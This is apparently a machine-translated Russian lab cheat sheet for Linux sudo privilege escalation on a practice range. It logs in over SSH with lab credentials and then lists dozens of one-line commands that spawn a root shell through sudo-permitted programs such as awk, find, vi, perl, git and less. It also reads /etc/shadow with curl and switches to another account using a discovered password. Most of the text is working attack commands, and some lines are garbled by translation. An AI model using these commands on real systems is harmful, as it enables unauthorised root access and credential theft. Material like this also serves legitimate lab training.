Конфигурация среды

Здесь используется диапазон linusec

Пароль для входа в учетную запись:

счет：bob пароль：secret

Это пользователь с обычными разрешениями

Здесь предполагается, что kali получила права обычного пользователя.

Kali подключается к целевой машине по SSH

ssh bob@[целевой IP]

пароль

secret

ash также представляет собой оболочку, которая занимает очень мало ресурсов и может быть включена администратором.

sudo ash

awk — мощный инструмент анализа текста

sudo awk 'BEGIN {system("/bin/sh")}'

Используйте эту команду для прямого повышения привилегий до суперпользователя.

bashПовышение привилегий
bash
sudo bash

csh тоже оболочка

sudo csh

повышение привилегий Curl

sudo curl file:///etc/shadow

Dash На некоторых небольших устройствах может быть установлена

sudo dash

редактор текстового редактора, одновременно можно редактировать только одну строку

sudo ed

！/bin/sh

env запрашивает переменные среды. Вы можете выполнить файл bin/sh при запросе переменных среды.

sodu env /bin/sh

ожидайте комплект взаимодействия с автоматизацией, вы можете взаимодействовать при выполнении программы

sudo expect -c 'spawn /bin/sh;interact'

find указывает файл поиска

sudo find . -exec /bin/sh \; -quit

ftp

less /etc/passwd

Выполнять файл sh при чтении файла

！/bin/sh

sudo man man Подробное объяснение команды man. Команда man — это справочная команда в Linux. После ее двукратного выполнения и возникновения проблем введите следующий код, чтобы прочитать и использовать bin/sh.

! /bin/sh

socat также является многофункциональным сетевым инструментом.

sudo socat stdin exec:/bin/sh

SSH-команда

sudo ssh -o ProxyCommand=' :sh 0<&2 1>&2' x

vi 
sudo vi -c ':!/bin/sh' /dev/null

Zsh также является разновидностью оболочки и используется в некоторых Linux.

sudo zsh

pico используется для редактирования текстовых файлов

sudo pico
^R^X
reset; sh 1>&0 2>&0

rvim улучшенная версия vi

Используйте rvim плюс python3 для выполнения команд

sudo rvim -c ':python3 import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'

Perl-среда

sudo perl -e 'exec "/bin/sh";'

язык сценариев tclsh

sudo tclsh
exec /bin/sh <@stdin > @stdout 2>@stderr

git повышение привилегий закрытая система управления программами с открытым исходным кодом

sudo git -p help config
! /bin/sh

script 
sudo script -q /dev/null

набор задач устанавливает команду потока, которая может привязать команду к конкретному процессору для запуска.

sudo taskset 1 /bin/sh -p

парольтрескаться

cat /etc/passwd

insecurity парольP@ssw0rd

su insecurity

Переключиться на права этого пользователя